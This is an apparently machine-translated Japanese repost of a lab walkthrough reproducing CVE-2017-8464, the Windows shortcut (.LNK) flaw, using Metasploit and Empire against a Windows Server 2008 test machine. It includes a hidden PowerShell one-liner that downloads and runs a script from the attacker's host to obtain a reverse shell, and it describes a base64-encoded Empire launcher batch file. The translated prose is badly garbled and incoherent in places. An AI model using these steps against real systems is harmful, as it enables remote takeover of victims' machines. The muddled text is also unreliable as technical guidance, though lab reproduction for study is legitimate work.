【シェル】CVE-2017-8464の脆弱性の再現性

0x01の脆弱性原理

バイナリを使用して、.LNKサフィックスを解析することにより、Windowsシステムファイルが解決されると、それはプロセスのExplorer.exeランニングであるため、悪質なバイナリコードがリモートシステム識別コードの実行上で実行するときは、達成することができ、これに読み込みます現在のユーザーが同じ権利を持っているメモリ。

だから、攻撃者は、この解析プロセスを活用、リムーバブルドライブ(またはリモートの共有プロセス)の後にされて入ってきた悪質なバイナリコードが含まれます、ファイルを解析.LNK PowerShellを使用して、被害者はハッカーによって制御されます。

攻撃者はこの脆弱性を悪用ローカルユーザーと同じ権限を取得する可能性があります。

0x02の影響を受けるバージョン

windows 7(32/64位)
windows 8(32/64位)
windows 8.1(32/64位)
windows 10(32/64位,RTM/TH2/RS1/RS2)
windows server 2008(32/64位/IA64)
windows server 2008 R2(64位/IA64)
windows server 2012
windows server 2012 R2
windows server 2016
windows Vista

0x03の1を活用

既存の脆弱性を悪用し、ターゲットホストにMetasploitのを使用してください。可能なシェルを使用して、マルチ/ハンドラの監視モジュールを選択しました。

まず、CVE-2017から8464は、環境、カーリー仮想マシンとWindows server2008を再現する準備ができています。

攻撃:カーリーIP:192.168.137.133

ドローン:IP server2008窓:192.168.137.132

3.1オープンカーリー端子は、ファイルPowerShellを生成します

3.2は、生成されたファイルは、アップ/ダウンvar / www / htmlディレクトリに移動し、

3.3オープンApacheサービス

ページにアクセスするには、3.4の試み

3.5アクセスは問題ありません、我々はモニタモジュールマルチ/ハンドラを使用して、MSFを起動し、対応するオプションを設定します

3.6次に、リスニングを開始

3.7その後、我々は、ショートカットを作成し、ウィンドウserver2008に切り替え

ここでは、構築し、パスコードを入力します。

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.137.133/1.ps1');test.ps1"

3.8 [次へ]をクリックし、その後、生成する[完了]をクリックしますと、ショートカットのPowerShellで

このショートカット秒バック、撃たないので、私たちはので、ここで、約3.9ショートカットをダブルクリックして実行します

ないマップ、それはダブルクリックします。その後、我々はカーリーの仮想マシンをカットバック、それが見つかりました。シェルに回復しました

0x04の2を利用します

4.1帝国攻撃ツールWin10システムでは、以下に示すように:

4.2ここでは、ツールを見つけるだろうし、帝国MSFは似た外観を持っています。

私たちは、その後、スクリプトは.batファイル生成のWindowsによって認識され、その後すぐに/ tmpに保存することができます使用します。

4.3あなたはコウモリのスクリプトを開くために、メモ帳を使用する場合、あなたはbase64で暗号化を使用して、悪質なバイナリコードを見ることができます:

4.4このファイルがアップして戻っリスニングポートに、Windowsで動作してlauncher.bat命名されたときは、ターゲットホストがライン上にすでにある見ることができます。

4.5ので、Windowsは、現在のユーザー権限を取得します。

0x05の参照リンク

1. CVE-2017から8464の脆弱性の再現性

2. 「Stuxnetの3世代」CVE-2017から8464の脆弱性は、PowerShellの上に再現します

おすすめ

転載: www.cnblogs.com/-mo-/p/11442815.html